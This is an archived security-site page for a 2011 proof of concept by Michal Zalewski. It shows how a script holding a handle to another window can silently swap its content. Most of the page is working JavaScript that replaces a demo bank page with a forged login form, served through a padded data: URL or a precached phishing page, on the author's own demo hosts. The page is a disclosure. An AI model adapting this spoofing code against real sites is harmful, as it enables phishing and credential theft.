what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

JavaScript Switcharoo Proof Of Concept

JavaScript Switcharoo Proof Of Concept
Posted Dec 8, 2011
Authored by Michal Zalewski | Site lcamtuf.coredump.cx

It seems that relatively few people realize that holding a JavaScript handle to another window allows the attacker to tamper with the location and history objects at will, largely bypassing the usual SOP controls. With some minimal effort and the help of data: / javascript: URLs or precached pages, this can be leveraged to replace content in a manner that will likely escape even fairly attentive users.

tags | exploit, javascript
SHA-256 | fcf6a2f8bd756f73ae0cea59488d296084adcdadeda5ca6d9e401595b8736f42

JavaScript Switcharoo Proof Of Concept

Change Mirror Download
/* 

Another whimsical browser proof-of-concept:

http://lcamtuf.coredump.cx/switch/

It seems that relatively few people realize that holding a JavaScript
handle to another window (either because we opened it, or because the
window was at some point displaying our content) allows the attacker
to tamper with the location and history objects at will, largely
bypassing the usual SOP controls. With some minimal effort and the
help of data: / javascript: URLs or precached pages, this can be
leveraged to replace content in a manner that will likely escape even
fairly attentive users.

/mz

*/



<script>

/*
If you don't get it, beaver.coredump.cx is a trusted banking website;
everything else is attacker-controlled. We begin by opening the
legitimate, trusted website. Timing is essential. Once the banking
website is loaded, follow the displayed security tip.

*/

var spaces =
" " +
" " +
" " +
" " +
" " +
" " +
" " +
" ";

var bank_html =
"<title>Beaver Creek Online Banking and BBQ</title>" +
"<h1>Beaver Creek Online Banking and BBQ</h1>" +
"<p>" +
"<font color=crimson>Security tip: please confirm that you see " +
"<code>http://beaver.coredump.cx/</code> in the address bar!</font>" +
"<p><table><tr>" +
"<td>Login:</td><td><input type=text></td></tr><tr>" +
"<td>Password:</td><td><input type=password></td></tr></table><p>" +
"<input type=submit value='Log in!'>";

var w;

function dostuff() {

/* Precache */

if ('v' == '\v') {
var x = new Image();
x.src = 'http://spoofed.coredump.cx/phish/';
}

w = window.open('http://beaver.coredump.cx/beaver/', 'target');

setTimeout(dostuff2, 5000);

}


function dostuff2() {

if ('v' == '\v')
w.open('http://spoofed.coredump.cx/phish/','target');
else
w.location.replace('data:text/html;np.cx/beaver/' + spaces + ',' + escape(bank_html));

}

</script>
<h3>The old switcharoo</h3>
This is hardly new, but illustrates the effectiveness of using
data: or precached content to do the deed. You're probably
fooling yourself if you think you'd spot this happening to you
in the wild.
<p>
<input type=submit onclick="dostuff()" value="Do it">
<p>
<font color=gray>PS. If you don't get it, close the window and try again. If you're still stumped, view the source.</font>


Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close